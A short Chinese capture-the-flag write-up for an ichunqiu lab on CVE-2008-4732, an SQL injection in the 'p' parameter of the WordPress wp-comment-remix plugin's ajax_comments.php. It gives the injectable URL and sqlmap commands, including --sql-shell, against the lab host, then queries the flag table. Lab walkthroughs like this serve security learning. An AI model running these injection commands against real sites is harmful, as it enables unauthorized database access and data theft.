春秋云境CVE-2008-4732

1.阅读靶场介绍

这里可以得到的就是这个ajax_comments.php

这个插件的p参数存在sql注入

简单来说就是

ajax_comments.php?p=xxx

这样的形式可以sql注入

2.启动靶场

得到如下所示的页面

3.poc

构造如下url

https://eci-2ze7tvqb4wpu88is4jh7.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-comment-remix/ajax_comments.php?p=1

我们可以得到如下页面

接下来就是复制url

然后启动sqlmap

执行一下语句

sqlmap.py -u https://eci-2ze7tvqb4wpu88is4jh7.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-comment-remix/ajax_comments.php?p=1 --batch

如下所示

一直直到它查出来存在sql注入时

如下所示

我们可以再执行如下命令

sqlmap.py -u https://eci-2ze7tvqb4wpu88is4jh7.cloudeci1.ichunqiu.com:80/wp-content/plugins/wp-comment-remix/ajax_comments.php?p=1 --batch --sql-shell

如下所示

最后就是去查询flag

执行下述命令

select * from flag

到此我们就完成夺旗了

文章也接近尾声了

感谢各位花费宝贵的时间来观看我的文章

相关推荐
aaaffaewrerewrwer6 小时前
免费在线 AVIF 转 WebP 工具推荐(支持批量转换 + 浏览器本地处理 + 无需上传)
安全·个人开发
zhengfei6116 小时前
【渗透工具】Payloader — 渗透测试辅助平台(payload一键所有)
网络·安全·web安全
Multipath7128 小时前
无人区不掉线:多链路聚合路由,为环塔拉力赛筑起“空中通讯走廊”
网络·5g·安全·无人机·实时音视频
知识浅谈8 小时前
人工智能日报 每日AI新闻(2026年6月8日):OpenAI安全加码、苹果AI升级前夜与国产AI应用落地
人工智能·安全·chatgpt
上海云盾-小余10 小时前
接口高频恶意刷取怎么防?网关限流搭配 WAF 联合防护方案
网络·安全
持敬chijing12 小时前
Web渗透之SQL注入-二次注入(Second-Order SQL Injection)
sql·安全·web安全·网络安全·网络攻击模型·安全威胁分析
AI帮小忙13 小时前
主机安全排查
linux·服务器·安全
AI人工智能+电脑小能手13 小时前
【大白话说Java面试题 第102题】【并发篇】第2题:volatile 能否保证线程安全?
java·安全·面试
laoli_coding13 小时前
数据机密性保护算法汇总(国际算法)
安全·网络安全·密码学
Lyyaoo.14 小时前
【数据结构】HashMap底层存储+扩容机制+线程安全【待更新】
数据结构·安全·哈希算法